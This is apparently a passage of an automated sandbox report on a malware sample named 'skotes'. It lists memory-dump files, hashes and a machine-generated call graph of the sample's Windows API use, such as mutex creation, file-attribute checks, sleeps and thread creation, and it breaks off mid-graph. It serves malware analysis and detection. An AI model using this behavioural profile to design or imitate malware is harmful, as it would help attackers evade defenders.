                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1783317671.0000000000DCA000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1783340016.0000000000DCD000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1783363276.0000000000DD5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1783389321.0000000000DD6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1783412208.0000000000DE5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1783434522.0000000000DEC000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1783457284.0000000000DF4000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1783484026.0000000000DF5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1783507403.0000000000DFD000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1783530009.0000000000E00000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1783555831.0000000000E10000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1783579002.0000000000E13000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1783579002.0000000000E3E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1783645404.0000000000E55000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1783668079.0000000000E56000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1783692746.0000000000E6A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1783716826.0000000000E6B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1783738588.0000000000E6C000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1783764751.0000000000E71000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1783787888.0000000000E73000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1783814321.0000000000E80000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1783837074.0000000000E81000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_b70000_skotes.jbxd
                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Mtx_unlock
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 1418687624-0
                                                                                                                                                                                                                                          • Opcode ID: 25e1ddbf7358814f205d7bb65d61d0ef3abe49c1018f9abe92e7995d402209c3
                                                                                                                                                                                                                                          • Instruction ID: 583099aebe30a6a4c5a8a0bab37f3a427bedc90798c9e8eaa9ee393735668e98
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 25e1ddbf7358814f205d7bb65d61d0ef3abe49c1018f9abe92e7995d402209c3
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 37A1E3B0A012059FDB10EF64C844B6ABBF8FF15710F0481A9E829D7691EB31EA04DBE1

                                                                                                                                                                                                                                          Execution Graph

                                                                                                                                                                                                                                          Execution Coverage:5.7%
                                                                                                                                                                                                                                          Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                                                                          Signature Coverage:0%
                                                                                                                                                                                                                                          Total number of Nodes:1037
                                                                                                                                                                                                                                          Total number of Limit Nodes:111
                                                                                                                                                                                                                                          execution_graph 36049 b7a7b7 GetFileAttributesA 36050 b7a7c7 _Ref_count_obj 36049->36050 36051 b7a94e 36050->36051 36054 b7a892 _Ref_count_obj 36050->36054 36052 b7a953 Sleep CreateMutexA 36051->36052 36077 ba6c6a 36051->36077 36059 b7a98e 36052->36059 36062 b880c0 36054->36062 36057 b7a903 36058 b7a9a7 36059->36058 36080 ba6629 GetPEB GetPEB RtlAllocateHeap __FrameHandler3::FrameUnwindToState 36059->36080 36061 b7a9b0 36065 b88104 36062->36065 36066 b880de __InternalCxxFrameHandler 36062->36066 36063 b881ee 36089 b89270 RtlAllocateHeap RtlAllocateHeap Concurrency::details::_CancellationTokenState::_RegisterCallback 36063->36089 36065->36063 36068 b88158 36065->36068 36069 b8817d 36065->36069 36066->36057 36067 b881f3 36090 b72480 RtlAllocateHeap RtlAllocateHeap ___std_exception_copy Concurrency::details::_CancellationTokenState::_RegisterCallback Concurrency::details::ScheduleGroupSegmentBase::ScheduleTask 36067->36090 36068->36067 36081 b8d3e2 36068->36081 36073 b8d3e2 Hash 2 API calls 36069->36073 36074 b88169 std::_Rethrow_future_exception 36069->36074 36071 b881f8 36073->36074 36075 b881d0 _Ref_count_obj 36074->36075 36076 ba6c6a Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 36074->36076 36075->36057 36076->36063 36102 ba6bf6 RtlAllocateHeap __cftof __dosmaperr 36077->36102 36079 ba6c79 __cftof 36080->36061 36084 b8d3e7 Hash 36081->36084 36083 b8d401 36083->36074 36084->36083 36085 b72480 Concurrency::details::_CancellationTokenState::_RegisterCallback Concurrency::details::ScheduleGroupSegmentBase::ScheduleTask 36084->36085 36091 ba8be1 36084->36091 36087 b8d40d Concurrency::details::ResourceManager::ResourceManager Concurrency::details::ScheduleGroupSegmentBase::ScheduleTask 36085->36087 36097 ba38af RtlAllocateHeap RtlAllocateHeap ___std_exception_copy Concurrency::details::ResourceManager::CleanupTopologyInformation 36085->36097 36088 b724c3 36088->36074 36090->36071 36096 bab04b Hash __dosmaperr 36091->36096 36092 bab089 36098 ba75f6 36092->36098 36094 bab074 RtlAllocateHeap 36095 bab087 36094->36095 36094->36096 36095->36084 36096->36092 36096->36094 36097->36088 36101 baa7c8 RtlAllocateHeap __dosmaperr ___free_lconv_mon 36098->36101 36100 ba75fb 36100->36095 36101->36100 36102->36079 36103 ba6dda 36104 ba6de8 36103->36104 36105 ba6df6 36103->36105 36106 ba6e4c 9 API calls 36104->36106 36116 ba698d 36105->36116 36109 ba6df2 36106->36109 36108 ba6e10 36119 ba68ed 36108->36119 36112 ba6e24 36114 ba6e46 36112->36114 36145 baadf5 RtlAllocateHeap __dosmaperr 36112->36145 36146 ba690a 36116->36146 36118 ba699f __wsopen_s 36118->36108 36157 ba683b 36119->36157 36122 ba6e4c 36123 ba6e5a 36122->36123 36126 ba6e77 Mailbox 36122->36126 36195 ba75e3 RtlAllocateHeap __dosmaperr 36123->36195 36125 ba6e5f 36127 ba75f6 __dosmaperr RtlAllocateHeap 36125->36127 36128 ba6eb9 CreateFileW 36126->36128 36129 ba6e9d 36126->36129 36132 ba6e67 36127->36132 36130 ba6eeb 36128->36130 36131 ba6edd 36128->36131 36197 ba75e3 RtlAllocateHeap __dosmaperr 36129->36197 36199 ba6f2a GetPEB RtlAllocateHeap GetPEB RtlAllocateHeap __dosmaperr 36130->36199 36174 ba6fb4 GetFileType 36131->36174 36196 ba6c5a RtlAllocateHeap __cftof 36132->36196 36137 ba6ea2 36139 ba75f6 __dosmaperr RtlAllocateHeap 36137->36139 36138 ba6e72 36138->36112 36140 ba6ea9 36139->36140 36198 ba6c5a RtlAllocateHeap __cftof 36140->36198 36142 ba6eb4 36142->36112 36143 ba6ee6 Mailbox 36143->36142 36144 ba6f1c CloseHandle 36143->36144 36144->36142 36145->36114 36147 ba6921 36146->36147 36148 ba692a 36146->36148 36147->36118 36148->36147 36154 baa671 3 API calls 3 library calls 36148->36154 36150 ba694a 36155 bab5fb GetPEB GetPEB RtlAllocateHeap __cftof 36150->36155 36152 ba6960 36156 bab628 GetPEB GetPEB RtlAllocateHeap __cftof 36152->36156 36154->36150 36155->36152 36156->36147 36158 ba6849 36157->36158 36159 ba6863 36157->36159 36170 ba69cc RtlAllocateHeap ___free_lconv_mon 36158->36170 36161 ba686a 36159->36161 36163 ba6889 __fassign 36159->36163 36164 ba6853 36161->36164 36171 ba69e6 RtlAllocateHeap RtlAllocateHeap __wsopen_s 36161->36171 36165 ba689f __fassign 36163->36165 36173 ba69e6 RtlAllocateHeap RtlAllocateHeap __wsopen_s 36163->36173 36164->36112 36164->36122 36165->36164 36172 ba75c0 RtlAllocateHeap __dosmaperr 36165->36172 36168 ba68ab 36169 ba75f6 __dosmaperr RtlAllocateHeap 36168->36169 36169->36164 36170->36164 36171->36164 36172->36168 36173->36165 36175 ba6fef 36174->36175 36176 ba70a1 36174->36176 36177 ba7009 Mailbox 36175->36177 36214 ba732a RtlAllocateHeap __dosmaperr 36175->36214 36180 ba70be 36176->36180 36181 ba70af 36176->36181 36184 ba7098 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 36176->36184 36179 ba7028 GetFileInformationByHandle 36177->36179 36177->36184 36179->36180 36182 ba703e 36179->36182 36216 ba75c0 RtlAllocateHeap __dosmaperr 36180->36216 36183 ba75f6 __dosmaperr RtlAllocateHeap 36181->36183 36200 ba727c 36182->36200 36183->36184 36184->36143 36189 ba705b 36190 ba7124 SystemTimeToTzSpecificLocalTime 36189->36190 36191 ba706e 36190->36191 36192 ba7124 SystemTimeToTzSpecificLocalTime 36191->36192 36193 ba7085 36192->36193 36215 ba7249 RtlAllocateHeap __dosmaperr 36193->36215 36195->36125 36196->36138 36197->36137 36198->36142 36199->36143 36202 ba7292 _wcsrchr 36200->36202 36201 ba704a 36210 ba7124 36201->36210 36202->36201 36217 babc13 GetPEB GetPEB RtlAllocateHeap __cftof __dosmaperr 36202->36217 36204 ba72d6 36204->36201 36218 babc13 GetPEB GetPEB RtlAllocateHeap __cftof __dosmaperr 36204->36218 36206 ba72e7 36206->36201 36219 babc13 GetPEB GetPEB RtlAllocateHeap __cftof __dosmaperr 36206->36219 36208 ba72f8 36208->36201 36220 babc13 GetPEB GetPEB RtlAllocateHeap __cftof __dosmaperr 36208->36220 36211 ba713c 36210->36211 36212 ba715c SystemTimeToTzSpecificLocalTime 36211->36212 36213 ba7142 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 36211->36213 36212->36213 36213->36189 36214->36177 36215->36184 36216->36184 36217->36204 36218->36206 36219->36208 36220->36201 36221 baac53 36226 baaa29 36221->36226 36224 baac92 36227 baaa48 36226->36227 36228 baaa5b 36227->36228 36230 baaa70 36227->36230 36229 ba75f6 __dosmaperr RtlAllocateHeap 36228->36229 36231 baaa60 36229->36231 36233 baab90 36230->36233 36247 bb132b GetPEB GetPEB RtlAllocateHeap __cftof __dosmaperr 36230->36247 36246 ba6c5a RtlAllocateHeap __cftof 36231->36246 36234 ba75f6 __dosmaperr RtlAllocateHeap 36233->36234 36235 baaa6b 36233->36235 36236 baac41 36234->36236 36235->36224 36243 bb1a9c 36235->36243 36250 ba6c5a RtlAllocateHeap __cftof 36236->36250 36239 baabe0 36239->36233 36248 bb132b GetPEB GetPEB RtlAllocateHeap __cftof __dosmaperr 36239->36248 36241 baabfe 36241->36233 36249 bb132b GetPEB GetPEB RtlAllocateHeap __cftof __dosmaperr 36241->36249 36251 bb1461 36243->36251 36245 bb1ab7 36245->36224 36246->36235 36247->36239 36248->36241 36249->36233 36250->36235 36254 bb146d __FrameHandler3::FrameUnwindToState 36251->36254 36252 bb1474 36253 ba75f6 __dosmaperr RtlAllocateHeap 36252->36253 36256 bb1479 36253->36256 36254->36252 36255 bb149f 36254->36255 36260 bb1a2e 36255->36260 36269 ba6c5a RtlAllocateHeap __cftof 36256->36269 36259 bb1483 __wsopen_s 36259->36245 36261 ba698d __wsopen_s 3 API calls 36260->36261 36262 bb1a50 36261->36262 36263 ba68ed __wsopen_s 2 API calls 36262->36263 36264 bb1a5d 36263->36264 36265 bb1a64 36264->36265 36270 bb1abc 36264->36270 36267 bb1a96 36265->36267 36311 baadf5 RtlAllocateHeap __dosmaperr 36265->36311 36267->36259 36269->36259 36271 bb1ad9 36270->36271 36272 bb1aee 36271->36272 36273 bb1b07 36271->36273 36317 ba75e3 RtlAllocateHeap __dosmaperr 36272->36317 36312 babf3a 36273->36312 36276 bb1af3 36281 ba75f6 __dosmaperr RtlAllocateHeap 36276->36281 36277 bb1b0c 36278 bb1b2c 36277->36278 36279 bb1b15 36277->36279 36316 bb1775 CreateFileW 36278->36316 36318 ba75e3 RtlAllocateHeap __dosmaperr 36279->36318 36307 bb1b00 36281->36307 36283 bb1b1a 36284 ba75f6 __dosmaperr RtlAllocateHeap 36283->36284 36284->36276 36285 bb1be2 GetFileType 36286 bb1bed 36285->36286 36287 bb1c34 36285->36287 36321 ba75c0 RtlAllocateHeap __dosmaperr 36286->36321 36322 babe85 RtlAllocateHeap __dosmaperr __wsopen_s 36287->36322 36288 bb1bb7 36320 ba75c0 RtlAllocateHeap __dosmaperr 36288->36320 36289 bb1b65 36289->36285 36289->36288 36319 bb1775 CreateFileW 36289->36319 36293 bb1baa 36293->36285 36293->36288 36295 bb1c55 36297 bb1ca1 36295->36297 36323 bb1984 4 API calls 2 library calls 36295->36323 36296 bb1bfb 36296->36276 36302 ba75f6 __dosmaperr RtlAllocateHeap 36296->36302 36301 bb1ca8 36297->36301 36325 bb1522 4 API calls 3 library calls 36297->36325 36300 bb1cd6 36300->36301 36304 bb1ce4 36300->36304 36324 baaf48 RtlAllocateHeap __dosmaperr __wsopen_s 36301->36324 36302->36276 36304->36307 36326 bb1775 CreateFileW 36304->36326 36306 bb1d8b 36306->36307 36327 ba75c0 RtlAllocateHeap __dosmaperr 36306->36327 36307->36265 36309 bb1da1 36328 bac04d RtlAllocateHeap __dosmaperr __wsopen_s 36309->36328 36311->36267 36315 babf46 __FrameHandler3::FrameUnwindToState 36312->36315 36314 babf77 __wsopen_s 36314->36277 36315->36314 36329 babd14 36315->36329 36316->36289 36317->36276 36318->36283 36319->36293 36320->36276 36321->36296 36322->36295 36323->36297 36324->36307 36325->36300 36326->36306 36327->36309 36328->36307 36334 bad82f 36329->36334 36331 babd26 __wsopen_s 36338 baadf5 RtlAllocateHeap __dosmaperr 36331->36338 36333 babd88 36333->36314 36337 bad83c Hash __dosmaperr 36334->36337 36335 bad867 RtlAllocateHeap 36336 bad87a __dosmaperr 36335->36336 36335->36337 36336->36331 36337->36335 36337->36336 36338->36333 36353 b7a079 GetFileAttributesA 36356 b7a089 _Ref_count_obj 36353->36356 36354 b7a154 _Ref_count_obj 36360 b880c0 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 36354->36360 36355 b7a930 36357 ba6c6a Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 36355->36357 36356->36354 36356->36355 36358 b7a953 Sleep CreateMutexA 36357->36358 36363 b7a98e 36358->36363 36361 b7a903 36360->36361 36362 b7a9a7 36363->36362 36366 ba6629 GetPEB GetPEB RtlAllocateHeap __FrameHandler3::FrameUnwindToState 36363->36366 36365 b7a9b0 36366->36365 36367 b7a418 GetFileAttributesA 36370 b7a428 _Ref_count_obj 36367->36370 36368 b7a93f 36371 ba6c6a Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 36368->36371 36369 b7a4f3 _Ref_count_obj 36374 b880c0 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 36369->36374 36370->36368 36370->36369 36372 b7a944 36371->36372 36373 ba6c6a Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 36372->36373 36375 b7a949 36373->36375 36376 b7a903 36374->36376 36377 ba6c6a Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 36375->36377 36378 b7a94e 36377->36378 36379 b7a953 Sleep CreateMutexA 36378->36379 36380 ba6c6a Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 36378->36380 36383 b7a98e 36379->36383 36380->36379 36382 b7a9a7 36383->36382 36386 ba6629 GetPEB GetPEB RtlAllocateHeap __FrameHandler3::FrameUnwindToState 36383->36386 36385 b7a9b0 36386->36385 36387 b79ba5 GetFileAttributesA 36388 b79bb5 _Ref_count_obj 36387->36388 36389 b79c80 _Ref_count_obj 36388->36389 36390 b7a91c 36388->36390 36394 b880c0 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 36389->36394 36391 b7a953 Sleep CreateMutexA 36390->36391 36392 ba6c6a Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 36390->36392 36397 b7a98e 36391->36397 36392->36391 36395 b7a903 36394->36395 36396 b7a9a7 36397->36396 36400 ba6629 GetPEB GetPEB RtlAllocateHeap __FrameHandler3::FrameUnwindToState 36397->36400 36399 b7a9b0 36400->36399 36429 b80cad 36430 b80f13 _Ref_count_obj 36429->36430 36469 b87a00 36430->36469 36432 b80f34 36433 b87a00 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 36432->36433 36434 b80f46 36433->36434 36483 b7c360 36434->36483 36436 b80f4f 36488 ba6729 36436->36488 36440 b80f7f 36441 b87a00 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 36440->36441 36442 b80f94 _Ref_count_obj 36441->36442 36443 ba75f6 __dosmaperr RtlAllocateHeap 36442->36443 36446 b81168 36442->36446 36444 b8101e 36443->36444 36500 ba8ab6 36444->36500 36448 b880c0 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 36449 b8109d 36448->36449 36450 b87a00 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 36449->36450 36451 b810b8 36450->36451 36452 b87a00 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 36451->36452 36453 b810cd 36452->36453 36504 b77590 Sleep 36453->36504 36455 b810d6 36456 b87a00 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 36455->36456 36457 b81100 36456->36457 36522 b75c10 36457->36522 36459 b81107 36460 b87a00 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 36459->36460 36461 b8111d 36460->36461 36462 b87a00 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 36461->36462 36463 b81135 36462->36463 36464 b87a00 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 36463->36464 36465 b8114d 36464->36465 36466 b87a00 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 36465->36466 36467 b8115f 36466->36467 36534 b7e530 36467->36534 36470 b87a26 36469->36470 36471 b87a2d 36470->36471 36472 b87a81 36470->36472 36473 b87a62 36470->36473 36471->36432 36476 b8d3e2 Hash 2 API calls 36472->36476 36480 b87a76 std::_Rethrow_future_exception 36472->36480 36474 b87ab9 36473->36474 36475 b87a69 36473->36475 36688 b72480 RtlAllocateHeap RtlAllocateHeap ___std_exception_copy Concurrency::details::_CancellationTokenState::_RegisterCallback Concurrency::details::ScheduleGroupSegmentBase::ScheduleTask 36474->36688 36478 b8d3e2 Hash 2 API calls 36475->36478 36476->36480 36479 b87a6f 36478->36479 36479->36480 36481 ba6c6a Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 36479->36481 36480->36432 36482 b87ac3 __Cnd_destroy_in_situ __Mtx_destroy_in_situ Concurrency::details::_CancellationTokenState::_RegisterCallback Concurrency::details::_TaskCollection::~_TaskCollection _Ref_count_obj 36481->36482 36482->36432 36485 b7c839 36483->36485 36484 b7c8a1 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z _Ref_count_obj 36484->36436 36485->36484 36486 ba6c6a Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 36485->36486 36487 b7c8db 36486->36487 36689 ba6672 36488->36689 36490 b80f6e 36491 ba67b7 36490->36491 36492 ba67c3 __FrameHandler3::FrameUnwindToState 36491->36492 36493 ba67cd 36492->36493 36496 ba67e2 ___scrt_uninitialize_crt 36492->36496 36494 ba75f6 __dosmaperr RtlAllocateHeap 36493->36494 36495 ba67d2 36494->36495 36715 ba6c5a RtlAllocateHeap __cftof 36495->36715 36499 ba67dd 36496->36499 36716 ba6740 3 API calls 4 library calls 36496->36716 36499->36440 36501 ba8ad1 36500->36501 36717 ba8868 36501->36717 36505 b775e3 36504->36505 36506 b7765e 36504->36506 36747 b8d111 SleepConditionVariableCS 36505->36747 36508 b880c0 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 36506->36508 36510 b7767a 36508->36510 36509 b775ed 36509->36506 36748 b8d64e RtlAllocateHeap RtlAllocateHeap 36509->36748 36511 b880c0 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 36510->36511 36513 b77693 36511->36513 36515 b880c0 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 36513->36515 36514 b77654 36749 b8d0c7 RtlWakeAllConditionVariable 36514->36749 36516 b776ac CreateThread Sleep 36515->36516 36518 b776d9 _Ref_count_obj 36516->36518 36750 b77430 36516->36750 36519 b7777f _Ref_count_obj 36518->36519 36520 ba6c6a Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 36518->36520 36519->36455 36521 b777a0 36520->36521 36763 b75940 36522->36763 36526 b75c6a 36787 b74b30 36526->36787 36528 b75c7b _Ref_count_obj 36530 ba6c6a Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 36528->36530 36531 b75ce7 _Ref_count_obj 36528->36531 36529 b75d17 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z _Ref_count_obj 36529->36459 36530->36531 36531->36529 36532 ba6c6a Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 36531->36532 36533 b75d47 36532->36533 36535 b87a00 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 36534->36535 36536 b7e576 36535->36536 36537 b75c10 5 API calls 36536->36537 36538 b7e581 36537->36538 36539 b87a00 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 36538->36539 36540 b7e59c 36539->36540 36541 b75c10 5 API calls 36540->36541 36542 b7e5a7 36541->36542 36801 b89280 36542->36801 36544 b7e5ba 36806 b88320 36544->36806 36546 b7e5fc 36810 b88220 36546->36810 36548 b7e60d 36549 b88320 2 API calls 36548->36549 36550 b7e61e 36549->36550 36551 b87a00 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 36550->36551 36552 b7e7cb 36551->36552 36553 b87a00 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 36552->36553 36554 b7e7e0 36553->36554 36555 b87a00 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 36554->36555 36556 b7e7f2 36555->36556 36818 b7be30 36556->36818 36558 b7e7fe 36559 b87a00 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 36558->36559 36560 b7e813 36559->36560 36561 b87a00 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 36560->36561 36562 b7e82b 36561->36562 36563 b75c10 5 API calls 36562->36563 36564 b7e832 36563->36564 36846 b78580 36564->36846 36566 b7e83e 36567 b7ea8f __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z _Ref_count_obj 36566->36567 36568 ba6c6a Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 36566->36568 36567->36446 36569 b7eabd 36568->36569 36570 ba6c6a Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 36569->36570 36571 b7eac2 36570->36571 36572 b87a00 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 36571->36572 36573 b7eb19 36572->36573 36574 b75c10 5 API calls 36573->36574 36575 b7eb21 36574->36575 36855 b883c0 36575->36855 36577 b7eb36 36578 b88220 2 API calls 36577->36578 36579 b7eb45 GetFileAttributesA 36578->36579 36581 b7eb62 36579->36581 36582 b87a00 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 36581->36582 36583 b7ed60 36582->36583 36584 b75c10 5 API calls 36583->36584 36585 b7ed68 36584->36585 36586 b883c0 2 API calls 36585->36586 36587 b7ed7d 36586->36587 36588 b88220 2 API calls 36587->36588 36589 b7ed8c GetFileAttributesA 36588->36589 36593 b7eda9 36589->36593 36591 b880c0 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 36591->36593 36592 b7f699 _Ref_count_obj 36592->36446 36593->36591 36593->36592 36594 b7f6cb 36593->36594 36595 ba6c6a Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 36594->36595 36596 b7f6d0 36595->36596 36597 b87a00 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 36596->36597 36598 b7f727 36597->36598 36599 b75c10 5 API calls 36598->36599 36600 b7f72e 36599->36600 36601 b87a00 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 36600->36601 36602 b7f741 36601->36602 36603 b87a00 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 36602->36603 36604 b7f756 36603->36604 36605 b87a00 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 36604->36605 36606 b7f76b 36605->36606 36607 b87a00 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 36606->36607 36608 b7f77d 36607->36608 36609 b7e530 12 API calls 36608->36609 36610 b7f786 36609->36610 36611 b880c0 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 36610->36611 36612 b7f7aa 36611->36612 36613 b87a00 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 36612->36613 36614 b7f7ba 36613->36614 36615 b880c0 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 36614->36615 36616 b7f7d7 36615->36616 36617 b880c0 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 36616->36617 36619 b7f7f0 36617->36619 36618 b7f982 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z _Ref_count_obj 36618->36446 36619->36618 36620 ba6c6a Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 36619->36620 36621 b7f9b0 36620->36621 36622 b87a00 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 36621->36622 36623 b7fa04 36622->36623 36624 b75c10 5 API calls 36623->36624 36625 b7fa0b 36624->36625 36626 b87a00 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 36625->36626 36627 b7fa1e 36626->36627 36628 b87a00 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 36627->36628 36629 b7fa33 36628->36629 36630 b87a00 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 36629->36630 36631 b7fa48 36630->36631 36632 b87a00 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 36631->36632 36633 b7fa5a 36632->36633 36634 b7e530 12 API calls 36633->36634 36636 b7fa63 36634->36636 36635 b7fb35 _Ref_count_obj 36635->36446 36636->36635 36637 ba6c6a Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 36636->36637 36638 b7fb54 36637->36638 36639 b87a00 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 36638->36639 36640 b7fba5 36639->36640 36863 b79580 5 API calls 3 library calls 36640->36863 36642 b7fbb4 36864 b79230 5 API calls 3 library calls 36642->36864 36644 b7fbc3 36645 b88320 2 API calls 36644->36645 36646 b7fbdb 36645->36646 36646->36646 36647 b880c0 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 36646->36647 36648 b7fc8c 36647->36648 36649 b87a00 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 36648->36649 36650 b7fca7 36649->36650 36651 b87a00 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 36650->36651 36652 b7fcb9 36651->36652 36653 b7c360 RtlAllocateHeap 36652->36653 36654 b7fcc2 36653->36654 36655 ba6729 RtlAllocateHeap 36654->36655 36656 b7fce1 36655->36656 36657 b87a00 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 36656->36657 36658 b805d4 36657->36658 36659 b75c10 5 API calls 36658->36659 36660 b805db 36659->36660 36661 b87a00 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 36660->36661 36662 b805f1 36661->36662 36663 b87a00 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 36662->36663 36664 b80609 36663->36664 36665 b87a00 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 36664->36665 36666 b80621 36665->36666 36667 b87a00 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 36666->36667 36668 b80633 36667->36668 36669 b7e530 12 API calls 36668->36669 36671 b8063c 36669->36671 36670 b80880 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z _Ref_count_obj 36670->36446 36671->36670 36672 ba6c6a Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 36671->36672 36673 b808d3 36672->36673 36674 b87a00 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 36673->36674 36675 b80987 36674->36675 36676 b75c10 5 API calls 36675->36676 36677 b8098e 36676->36677 36678 b87a00 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 36677->36678 36679 b809a4 36678->36679 36680 b87a00 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 36679->36680 36681 b809bc 36680->36681 36682 b87a00 